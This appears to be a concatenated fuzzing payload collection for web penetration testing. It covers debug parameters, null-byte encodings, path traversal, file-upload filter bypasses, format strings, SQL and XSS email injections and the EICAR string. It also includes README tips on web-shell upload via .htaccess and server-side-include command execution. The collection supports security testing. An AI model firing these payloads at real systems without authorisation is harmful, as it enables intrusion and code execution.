0e4868841162506296635201967091461310754872302741
0e495317064156922585933029613272
0e591528
0e684322
0e69173478833895223726165786906905141502
0e73845709713699
0e817678
0e908730200858058999593322639865
0e9108479697641294204710754930487725109982883677
================================================
FILE: attack/business-logic/CommonDebugParamNames.txt
================================================
7357=1
7357=true
7357=y
7357=yes
access=1
access=true
access=y
access=yes
adm=1
adm1n=1
adm1n=true
adm1n=y
adm1n=yes
admin=1
admin=true
admin=y
admin=yes
adm=true
adm=y
adm=yes
dbg=1
dbg=true
dbg=y
dbg=yes
debug=1
debug=true
debug=y
debug=yes
edit=1
edit=true
edit=y
edit=yes
grant=1
grant=true
grant=y
grant=yes
test=1
test=true
test=y
test=yes
================================================
FILE: attack/business-logic/CommonMethodNames.txt
================================================
0
1
add
admin
alert
alter
auth
authenticate
append
calc
calculate
cancel
change
check
clear
click
clone
close
create
crypt
decrypt
del
delete
demo
disable
dl
download
edit
enable
encrypt
exec
execute
file
focus
get
help
initiate
is
list
load
ls
make
mod
mode
modify
move
new
off
on
open
post
proxy
pull
put
query
read
remove
rename
reset
retrieve
run
save
search
send
shell
show
snd
subtract
test
to
toggle
update
upload
verify
view
vrfy
with
================================================
FILE: attack/business-logic/DebugParams.Json.fuzz.txt
================================================
"7357":1
"7357":true
"7357":"y"
"7357":yes"
"access":1
"access":true
"access":"y"
"access":"yes"
"adm":1
"adm":true
"adm":"y"
"adm":"yes"
"adm1n":1
"adm1n":true
"adm1n":y"
"adm1n":"yes"
"admin":1
"admin":true
"admin":"y"
"admin":"yes"
"adm":1
"adm":true
"adm":"y"
"adm":"yes"
"dbg":1
"dbg":true
"dbg":"y"
"dbg":"yes"
"debug":1
"debug":true
"debug":"y"
"debug":"yes"
"edit":1
"edit":true
"edit":"y"
"edit":"yes"
"grant":1
"grant":true
"grant":"y"
"grant":"yes"
"test":1
"test":true
"test":"y"
"test":"yes"
================================================
FILE: attack/control-chars/HexValsAllBytes.txt
================================================
%00
%01
%02
%03
%04
%05
%06
%07
%08
%09
%0a
%0b
%0c
%0d
%0e
%0f
%10
%11
%12
%13
%14
%15
%16
%17
%18
%19
%1a
%1b
%1c
%1d
%1e
%1f
%20
%21
%22
%23
%24
%25
%26
%27
%28
%29
%2a
%2b
%2c
%2d
%2e
%2f
%30
%31
%32
%33
%34
%35
%36
%37
%38
%39
%3a
%3b
%3c
%3d
%3e
%3f
%40
%41
%42
%43
%44
%45
%46
%47
%48
%49
%4a
%4b
%4c
%4d
%4e
%4f
%50
%51
%52
%53
%54
%55
%56
%57
%58
%59
%5a
%5b
%5c
%5d
%5e
%5f
%60
%61
%62
%63
%64
%65
%66
%67
%68
%69
%6a
%6b
%6c
%6d
%6e
%6f
%70
%71
%72
%73
%74
%75
%76
%77
%78
%79
%7a
%7b
%7c
%7d
%7e
%7f
%80
%81
%82
%83
%84
%85
%86
%87
%88
%89
%8a
%8b
%8c
%8d
%8e
%8f
%90
%91
%92
%93
%94
%95
%96
%97
%98
%99
%9a
%9b
%9c
%9d
%9e
%9f
%a0
%a1
%a2
%a3
%a4
%a5
%a6
%a7
%a8
%a9
%aa
%ab
%ac
%ad
%ae
%af
%b0
%b1
%b2
%b3
%b4
%b5
%b6
%b7
%b8
%b9
%ba
%bb
%bc
%bd
%be
%bf
%c0
%c1
%c2
%c3
%c4
%c5
%c6
%c7
%c8
%c9
%ca
%cb
%cc
%cd
%ce
%cf
%d0
%d1
%d2
%d3
%d4
%d5
%d6
%d7
%d8
%d9
%da
%db
%dc
%dd
%de
%df
%e0
%e1
%e2
%e3
%e4
%e5
%e6
%e7
%e8
%e9
%ea
%eb
%ec
%ed
%ee
%ef
%f0
%f1
%f2
%f3
%f4
%f5
%f6
%f7
%f8
%f9
%fa
%fb
%fc
%fd
%fe
%ff
================================================
FILE: attack/control-chars/NullByteRepresentations.txt
================================================
%00
%00%00
\0
\0\
\00
\00\
\0\0
\0\0\
\0\0
\00\00\
\000
\000\
\0000
\0000\
\x00
\x00\
\x00\x00
\x00\x00\
\x0000
\x0000\
\x00000000
\x00000000\
\u0000
\u0000\
\u00000000
\u00000000\
\u0000\u0000
\u0000\u0000\
\z
\z\
NUL
NULL
nul
null
FALSE
false
0x00
0x0000
0x00000000
�
�
"\u0000"
u"\u0000"
0
00
0000
00000000
%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00
%C0%80
%E0%80%80
%F0%80%80%80
%F8%80%80%80%80
%FC%80%80%80%80%80
%FE%80%80%80%80%80%80
�
%2500
%252500
%25252500
%25%30%30
\x%30%30
%%30%30
%25%2530%2530
================================================
FILE: attack/control-chars/imessage.txt
================================================
Powerلُلُصّبُلُلصّبُررً ॣ ॣh ॣ ॣ冗
================================================
FILE: attack/control-chars/terminal-escape-codes.txt
================================================
Roses are [0;31mred[0m, violets are [0;34mblue. Hope you enjoy terminal hue
But now...[20Cfor my greatest trick...[8m
The quick brown fox... [Beeeep]
================================================
FILE: attack/control-chars/true.txt
================================================
TRUE
true
1
-1
4294967295
0xFFFFFFFF
\FFFFFFFF
\FFFFFFFF\
\xFFFFFFFF
================================================
FILE: attack/disclosure-directory/directory-indexing-generic.txt
================================================
/%3f.jsp
/?M=D
/?S=D
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
/cgi-bin/test-cgi?/*
/cgi-bin/test-cgi?*
/%00/
/%2e/
/%2f/
/%5c/
================================================
FILE: attack/disclosure-localpaths/unix/common-unix-httpd-log-locations.txt
================================================
/apache/logs/error.log
/apache/logs/access.log
/apache/logs/error.log
/apache/logs/access.log
/apache/logs/error.log
/apache/logs/access.log
/etc/httpd/logs/acces_log
/etc/httpd/logs/acces.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/apache/access_log
/var/log/apache2/access_log
/var/log/apache/access.log
/var/log/apache2/access.log
/var/log/access_log
/var/log/access.log
/var/www/logs/error_log
/var/www/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/var/log/apache/error_log
/var/log/apache2/error_log
/var/log/apache/error.log
/var/log/apache2/error.log
/var/log/error_log
/var/log/error.log
================================================
FILE: attack/disclosure-source/README.md
================================================
Notes:
**source-disc-cmd-exec-traversal.txt**
single directory traversals that have caused showcode or command exec issues in the past
``` GET /path/*payload*relative/path/to/target/file/ ```
**source-disclosure-generic.txt**
known cross platform source Code, file disclosure attack patterns - append after file or dir path
**source-disclosure-microsoft.txt**
microsoft-specific - appends after filename - try the generic list for microsoft, too
================================================
FILE: attack/disclosure-source/source-disc-cmd-exec-traversal.txt
================================================
..%255c
.%5c../..%5c
/..%c0%9v../
/..%c0%af../
/..%255c..%255c
================================================
FILE: attack/disclosure-source/source-disclosure-generic.txt
================================================
%70
.%E2%73%70
%2e0
%2e
.
\
?*
%20
%00
%2f
%5c
================================================
FILE: attack/disclosure-source/source-disclosure-microsoft.txt
================================================
# microsoft-specific appends - try the generic list, too
+.htr
::DATA$
================================================
FILE: attack/email/invalid-email-addresses.txt
================================================
justastring
email@addrese.com;secondemail@address.com
@address.com
Jacco Van Tuijl <email@example.com>
email.address.com
email@address@example.com
#@%^%#$@#$@#.com
.email@address.com
うえあいお@address.com
email.@address.com
email..email@address.com
email@address..com
email@address.com (Jacco van Tuijl)
email@-address.com
email@111.222.333.44444
Abc..123@address.com
“(),:;<>[\]@address.com
jacco"van"tuijl@address.com
jacco\ van"someting"tuijl\example@address.com
“email”@address.com
sql"or"1"="1"or"test@email.com
sql'or'1'='1'or'test@email.com
xss"><script>alert(1)</script><"test@address.com
a"b(c)d,e:f;g<h>i[j\k]l@example.com
this is"not\allowed@example.com
notallowed@example.com
notallowed@example.com
================================================
FILE: attack/email/valid-email-addresses.txt
================================================
email@eaddress.com
firstname.lastname@address.com
email@subdomain.address.com
firstname+lastname@address.com
name@129.129.129.129
name@[129.129.129.129]
0123456789@address.com
email@address-one.com
email@address.name
email@address.co.jp
firstname-lastname@address.com
much."more\ unusual"@address.com
very.unusual."@".unusual.com@address.com
very."(),:;<>[]".VERY."very@\\ "very".unusual@strange.address.com
abcdefghijklmnopqrstuvwxyz!#$%&'*+-/=?^_`{|}~.0123456789@abcdefghijklmnopqrstuvwxyz-ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789.com
{jacco'vantuijl}@address.server
"Jacco\@test"@address.com
"Jacco van Tuijl"@address.com
"Jacco\\test"@address.com
"Jacco@test"@address.com
Jacco/van=Tuijl@address.com
\$A12345@address.com
!def!abc%dfg@address.com
_jacco@address.com
a.long.email.address.test@dept.address.com
"jacco.vantuijl.@.address.com"@address.com
jacco@mailserver1
#!$%&'*+-/=?^_`{}|~@address.org
"()<>[]:,;@\\\"!#$%&'*+-/=?^_`{}| ~.a"@address.org
" "@address.org
üñîçøðé@address.com
address@üñîçøðé.com
üñîçøðé@üñîçøðé.com
================================================
FILE: attack/file-upload/README.md
================================================
File Upload Fuzzfiles- File Name Filter Bypass Notes
see: http://cwe.mitre.org/data/definitions/434.html
* kinds of file upload verifications:
* content-type
* filename extension verificationi (whitelist, blacklist)
* file content checking
* client side, ha ha ha
File notes:
**alt-extensions-asp.fuzz.txt**
**alt-extensions-coldfusion.fuzz.txt**
**alt-extensions-jsp.fuzz.txt**
**alt-extensions-perl.fuzz.txt**
**alt-extensions-php.fuzz.txt**
Alternative ways of expressing file extensions that will be interpreted correctly by the target filesystem/app and can be used to bypass blacklist filters:
**file-ul-filter-bypass-commonly-writable-directories.fuzz.txt** <br>
File directory names that experience has shown are often writable
**file-ul-filter-bypass-microsoft-asp-filetype-bf.fuzz.txt** <br>
``` {ASPSCRIPT} ``` gets regex replaced with the shell or other file you are trying to upload, {EXT} should be brute-forced with payloads from discovery/filename-bruteforce/file-extensions/, since some file upload types may be allowed that are not listed.
**file-ul-filter-bypass-microsoft-asp.fuzz.txt** <br>
this file contains a number of common predictable values. Add more if other file types are allowed, or use the filetype-bf version of this fuzzfile - ``` {ASPSCRIPT} ``` gets regex replaced.
**file-ul-filter-bypass-ms-php.fuzz.txt**
**file-ul-filter-bypass-x-platform-php.fuzz.txt** <br>
php on microsoft, cross-platform. use both on ms. <br>
Use exiftool http://www.sno.phy.queensu.ca/~phil/exiftool/ to create a .jpg image with the meta comment field set to:<br>
``` <?php phpinfo(); ?> ```
then regex replace ``` {PHPSCRIPT} ``` in the fuzzfile payload with the name of your .jpg file in the target directory<br>
**invalid-filenames-microsoft.fuzz.txt** <br>
Useful for causing error messages that contain an absolute drivepath, such as if you don't know where the file uploader puts files <br>
regex replace ``` {EXT} ``` with allowed extension type
**file-ul-filter-bypass-x-platform-generic.fuzz.txt** <br>
These might bypass a file upload blacklist but be written in a way that leaves them executable because of the filetype
regex replace ``` {PHPSCRIPT} ``` with your script name <br>
**invalid-filenames-linux.fuzz.txt** <br>
invalid filenames under linux, and since there aren't too many of those (there's one), other filepaths that may cause problems. these can be used to attempt to cause an error condition during file upload bypass attempts which might reveal an absolute path. Useful if you're not sure where your files are landing. <br>
**invalid-filesystem-chars-microsoft.fuzz.txt** <br>
list of invalid characters for windows filesystem - these can be used to attempt to cause an error condition during file upload bypass attempts which might reveal an absolute path. Useful if you're not sure where your files are landing. fuzz these into a filename during upload attempts <br>
**Addtl Tips:**
**For mod_cgi Server Side Include upload attacks:**
``` <!--#exec cmd="ls" --> ```
or, on Windows <br>
``` <!--#exec cmd="dir" --> ```
Sometimes you can overwrite .htaccess in an upload folder on Apache httpd, if so,
try setting jpg mimetype handler to executable. If you can set the target directory, try to fuzz the
list of all dirs you've enumerated on the servers, and try the commonly writable directory fuzzfile.
**example .htaccess entry that sets mime type .jpg to be executable:** <br>
``` AddType application/x-httpd-php .jpg ```
**Encoding Web Shells in PNG IDAT chunks** <br>
https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/ <br>
================================================
FILE: attack/file-upload/alt-extensions-asp.txt
================================================
asp
aspx
asa
aSP
aSpx
aSa
asp%20%20%20
aspx%20%20%20
asa%20%20%20
aSP%20%20%20
aSpx%20%20%20
aSa%20%20%20
asp......
aspx......
asa......
aSP......
aSpx......
aSa......
asp%20%20%20...%20.%20..
aspx%20%20%20...%20.%20..
asa%20%20%20...%20.%20..
aSP%20%20%20...%20.%20..
aSpx%20%20%20...%20.%20..
aSa%20%20%20...%20.%20..
asp%00
aspx%00
asa%00
aSp%00
aSpx%00
aSa%00
================================================
FILE: attack/file-upload/alt-extensions-coldfusion.txt
================================================
cfm
cfml
cfc
dbm
cFm
cFml
cFc
dBm
cfm%20%20%20
cfml%20%20%20
cfc%20%20%20
dbm%20%20%20
cFm%20%20%20
cFml%20%20%20
cFc%20%20%20
dBm%20%20%20
cfm......
cfml......
cfc.......
dbm......
cFm......
cFml......
cFc......
dBm......
cfm%20%20%20...%20.%20..
cfml%20%20%20...%20.%20..
cfc%20%20%20...%20.%20..
dbm%20%20%20...%20.%20..
cFm%20%20%20...%20.%20..
cFml%20%20%20...%20.%20..
cFc%20%20%20...%20.%20..
dBm%20%20%20...%20.%20..
cfm%00
cfml%00
cfc%00
dbm%00
cFm%00
cFml%00
cFc%00
dBm%00
================================================
FILE: attack/file-upload/alt-extensions-jsp.txt
================================================
jsp
jspx
jsw
jsv
jspf
jSp
jSpx
jSw
jSv
jSpf
jSp%00
jSp%20%20%20
jSp%20%20%20...%20.%20..a
jSp......
jSpf%00
jSpf%20%20%20
jSpf%20%20%20...%20.%20..a
jSpf......
jSpx%00
jSpx%20%20%20
jSpx%20%20%20...%20.%20..a
jSpx......
jSv%00
jSv%20%20%20
jSv%20%20%20...%20.%20..a
jSv......
jSw%00
jSw%20%20%20
jSw%20%20%20...%20.%20..a
jSw......
jsp%00
jsp%20%20%20
jsp%20%20%20...%20.%20..a
jsp......
jspf%00
jspf%20%20%20
jspf%20%20%20...%20.%20..a
jspf......
jspx%00
jspx%20%20%20
jspx%20%20%20...%20.%20..a
jspx......
jsv%00
jsv%20%20%20
jsv%20%20%20...%20.%20..a
jsv......
jsw%00
jsw%20%20%20
jsw%20%20%20...%20.%20..a
jsw......
================================================
FILE: attack/file-upload/alt-extensions-perl.txt
================================================
# .pm .lib cannot be called directly, must be called as modules
pl
pm
cgi
pL
pM
cGi
lib
lIb
cGi%00
cGi%20%20%20
cGi......
cgi%00
cgi%20%20%20
cgi......
lIb%00
lIb%20%20%20
lIb......
lib%00
lib%20%20%20
lib......
pL%00
pL%20%20%20
pL......
pM%00
pM%20%20%20
pM......
pl%00
pl%20%20%20
pl......
pm%00
pm%20%20%20
pm......
================================================
FILE: attack/file-upload/alt-extensions-php.txt
================================================
phtml
php
php3
php4
php5
inc
pHtml
pHp
pHp3
pHp4
pHp5
iNc
iNc%00
iNc%20%20%20
iNc%20%20%20...%20.%20..
iNc......
inc%00
inc%20%20%20
inc%20%20%20...%20.%20..
inc......
pHp%00
pHp%20%20%20
pHp%20%20%20...%20.%20..
pHp......
pHp3%00
pHp3%20%20%20
pHp3%20%20%20...%20.%20..
pHp3......
pHp4%00
pHp4%20%20%20
pHp4%20%20%20...%20.%20..
pHp4......
pHp5%00
pHp5%20%20%20
pHp5%20%20%20...%20.%20..
pHp5......
pHtml%00
pHtml%20%20%20
pHtml%20%20%20...%20.%20..
pHtml......
php%00
php%20%20%20
php%20%20%20...%20.%20..
php......
php3%00
php3%20%20%20
php3%20%20%20...%20.%20..
php3......
php4%00
php4%20%20%20
php4%20%20%20...%20.%20..
php4......
php5%00
php5%20%20%20
php5%20%20%20...%20.%20..
php5......
phtml%00
phtml%20%20%20
phtml%20%20%20...%20.%20..
phtml......
================================================
FILE: attack/file-upload/file-ul-filter-bypass-commonly-writable-directories.txt
================================================
templates_compiled
templates_c
templates
temporary
images
cache
temp
files
tmp
================================================
FILE: attack/file-upload/file-ul-filter-bypass-microsoft-asp-filetype-bf.txt
================================================
{ASPSCRIPT}
{ASPSCRIPT}.{EXT}
{ASPSCRIPT};
{ASPSCRIPT};.{EXT}
{ASPSCRIPT}%00
{ASPSCRIPT}%00.{EXT}
{ASPSCRIPT}::data%00.
{ASPSCRIPT}::data%00.{EXT}
================================================
FILE: attack/file-upload/file-ul-filter-bypass-microsoft-asp.txt
================================================
{ASPSCRIPT}
{ASPSCRIPT};
{ASPSCRIPT};.jpg
{ASPSCRIPT};.pdf
{ASPSCRIPT};.html
{ASPSCRIPT};.htm
{ASPSCRIPT};.txt
{ASPSCRIPT};.xyz
{ASPSCRIPT};.zip
{ASPSCRIPT};.tgz
{ASPSCRIPT};.doc
{ASPSCRIPT};.docx
{ASPSCRIPT};.xls
{ASPSCRIPT};.xlsx
{ASPSCRIPT}%00.jpg
{ASPSCRIPT}%00.pdf
{ASPSCRIPT}%00.html
{ASPSCRIPT}%00.txt
{ASPSCRIPT}%00.xyz
{ASPSCRIPT}%00.tgz
{ASPSCRIPT}%00.zip
{ASPSCRIPT}%00.doc
{ASPSCRIPT}%00.docx
{ASPSCRIPT}%00
{ASPSCRIPT}::data%00.jpg
{ASPSCRIPT}::data%00.pdf
{ASPSCRIPT}::data%00.html
{ASPSCRIPT}::data%00.txt
{ASPSCRIPT}::data%00.zip
{ASPSCRIPT}::data%00.doc
{ASPSCRIPT}::data%00.xls
{ASPSCRIPT}%00%20%20%20
{ASPSCRIPT}%00%20%20%20...%20.%20..
{ASPSCRIPT}%00......
{ASPSCRIPT}%20%20%20
{ASPSCRIPT}%20%20%20...%20.%20..
{ASPSCRIPT}......
{ASPSCRIPT}::data%00%%20%20%20
{ASPSCRIPT}::data%00%%20%20%20...%20.%20..
{ASPSCRIPT}::data%00%......
{ASPSCRIPT}%00%20%20%20;.jpg
{ASPSCRIPT}%00%20%20%20;.doc
{ASPSCRIPT}%00%20%20%20...%20.%20..;.jpg
{ASPSCRIPT}%00%20%20%20...%20.%20..;.doc
{ASPSCRIPT}%00......;.jpg
{ASPSCRIPT}%00......;.doc
{ASPSCRIPT}%20%20%20;.jpg
{ASPSCRIPT}%20%20%20;.doc
{ASPSCRIPT}%20%20%20...%20.%20..;.jpg
{ASPSCRIPT}%20%20%20...%20.%20..;.doc
{ASPSCRIPT}......;.jpg
{ASPSCRIPT}......;.doc
{ASPSCRIPT}::data%00%%20%20%20;.jpg
{ASPSCRIPT}::data%00%%20%20%20;.doc
{ASPSCRIPT}::data%00%%20%20%20...%20.%20..;.jpg
{ASPSCRIPT}::data%00%%20%20%20...%20.%20..;.doc
{ASPSCRIPT}::data%00%......;.jpg
{ASPSCRIPT}::data%00%......;.doc
================================================
FILE: attack/file-upload/file-ul-filter-bypass-ms-php.txt
================================================
{PHPSCRIPT}
{PHPSCRIPT}.phtml
{PHPSCRIPT}.php.html
{PHPSCRIPT}.php::$DATA
{PHPSCRIPT}.php.php.rar
{PHPSCRIPT}.php.rar
{PHPSCRIPT}::$DATA
================================================
FILE: attack/file-upload/file-ul-filter-bypass-x-platform-generic.txt
================================================
%00index.html
;index.html
%00
================================================
FILE: attack/file-upload/file-ul-filter-bypass-x-platform-php.txt
================================================
{PHPSCRIPT}
{PHPSCRIPT}.phtml
{PHPSCRIPT}.php.html
{PHPSCRIPT}.php.php.rar
{PHPSCRIPT}.php.rar
================================================
FILE: attack/file-upload/invalid-filenames-linux.txt
================================================
/
\0
/dev/null
/dev/null/foo
.
..
================================================
FILE: attack/file-upload/invalid-filenames-microsoft.txt
================================================
A:
ZZ:
CON
PRN
AUX
CLOCK$
NUL
COM1
COM2
COM3
COM4
COM5
COM6
COM7
COM8
COM9
LPT1
LPT2
LPT3
LPT4
LPT5
LPT6
LPT7
LPT8
LPT9
*
"
[
]
:
|
=
,
CON.{EXT}
PRN.{EXT}
AUX.{EXT}
CLOCK$.{EXT}
NUL.{EXT}
COM1.{EXT}
COM2.{EXT}
COM3.{EXT}
COM4.{EXT}
COM5.{EXT}
COM6.{EXT}
COM7.{EXT}
COM8.{EXT}
COM9.{EXT}
LPT1.{EXT}
LPT2.{EXT}
LPT3.{EXT}
LPT4.{EXT}
LPT5.{EXT}
LPT6.{EXT}
LPT7.{EXT}
LPT8.{EXT}
LPT9.{EXT}
*.{EXT}
".{EXT}
[.{EXT}
].{EXT}
:.{EXT}
|.{EXT}
=.{EXT}
,.{EXT}
================================================
FILE: attack/file-upload/invalid-filesystem-chars-microsoft.txt
================================================
*
.
"
/
\
[
]
:
;
|
=
,
================================================
FILE: attack/file-upload/invalid-filesystem-chars-osx.txt
================================================
# list of invalid characters for osx - these can be used to attempt to cause an error condition during file upload bypass attempts which might reveal an absolute path. Useful if you're not sure where your files are landing.
# fuzz these into a filename during upload attempts
:
================================================
FILE: attack/file-upload/malicious-images/README.md
================================================
From SecLists:
## lottapixel
Originally reported at https://hackerone.com/reports/390, addressed on paperclip.
A specially crafted JPEG (the original file was named lottapixel.jpg) causes attempts to determine the dimensions of the image to exhaust available memory. From the original report:
The exploit is really simple. I have an image of 5kb, 260x260 pixels. In the image itself I exchange the 260x260 values with 0xfafa x 0xfafa (so 64250x64250 pixels). Now from what I remember your service tries to convert the image once uploaded. By loading the 'whole image' into memory, it tries to allocate 4128062500 pixels into memory, flooding the memory and causing DoS.
## uber.gif
Current limits
Image size: 1 MB
Image dimensions: 2048x2048px
File types: jpg/png/gif
Another image hack
A GIF composed of 40k 1x1 images made Paperclip freeze until timeout.
As attachments I sent the file composed of 40k images, and a screenshot of the timeout.
## EICAR File
The EICAR Standard Anti-Virus Test File or EICAR test file is a computer file that was developed by the European Institute for Computer Antivirus Research (EICAR) and Computer Antivirus Research Organization (CARO), to test the response of computer antivirus (AV) programs. Instead of using real malware, which could do real damage, this test file allows people to test anti-virus software without having to use a real computer virus.
Anti-virus programmers set the EICAR string as a verified virus, similar to other identified signatures. A compliant virus scanner, when detecting the file, will respond in exactly the same manner as if it found a harmful virus. Not all virus scanners are compliant, and may not detect the file even when they are correctly configured.
The use of the EICAR test string can be more versatile than straightforward detection: a file containing the EICAR test string can be compressed or archived, and then the antivirus software can be run to see whether it can detect the test string in the compressed file.
## xssproject File
As you may already know, it is possible to make a website vulnerable to XSS if you can upload/include a SWF file into that website. I am going to represent this SWF file that you can use in your PoCs.
This method is based on [1] and [2], and it has been tested in Google Chrome, Mozilla Firefox, IE9/8; there should not be any problem with other browsers either.
Examples:
Browsers other than IE: http://0me.me/demo/xss/xssproject.swf?js=alert(document.domain);
IE8: http://0me.me/demo/xss/xssproject.swf?js=try{alert(document.domain)}catch(e){ window.open(‘?js=history.go(-1)’,’_self’);}
IE9: http://0me.me/demo/xss/xssproject.swf?js=w=window.open(‘invalidfileinvalidfileinvalidfile’,’target’);setTimeout(‘alert(w.document.location);w.close();’,1);
## POC_img_phpinfo File
Outlined here: https://www.secgeek.net/bookfresh-vulnerability/
================================================
FILE: attack/file-upload/malicious-images/eicar.com.txt
================================================
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
================================================
FILE: attack/format-strings/format-strings.txt
================================================
%s%p%x%d
%p%p%p%p
%x%x%x%x
%d%d%d%d
%s%s%s%s
%99999999999s
%08x
%20d
%20n
%20x
%20s
%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d
%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i
%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o
%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X
%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a
%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A
%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e
%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E
%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f
%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F
%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g
%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s
%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%
XXXXX.%p
XXXXX`perl -e 'print ".%p" x 80'`
`perl -e 'print ".%p" x 80'`%n
%08x.%08x.%08x.%08x.%08x\n
XXX0_%08x.%08x.%08x.%08x.%08x\n
%.16705u%2\$hn
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|
AAAAA%c
AAAAA%d
AAAAA%e
AAAAA%f
AAAAA%I
AAAAA%o
AAAAA%p
AAAAA%s
AAAAA%x
AAAAA%n
ppppp%c
ppppp%d
ppppp%e
ppppp%f
ppppp%I
ppppp%o
ppppp%p
ppppp%s
ppppp%x
ppppp%n
%@
%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@
%*
%*p
%*x
%*s
%*S
%*$*
%*$*p
%*$*x
%*$*s
%*$*S
================================================
FILE: attack/html_js_fuzz/HTML5sec_Injections.txt
================================================
<form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>
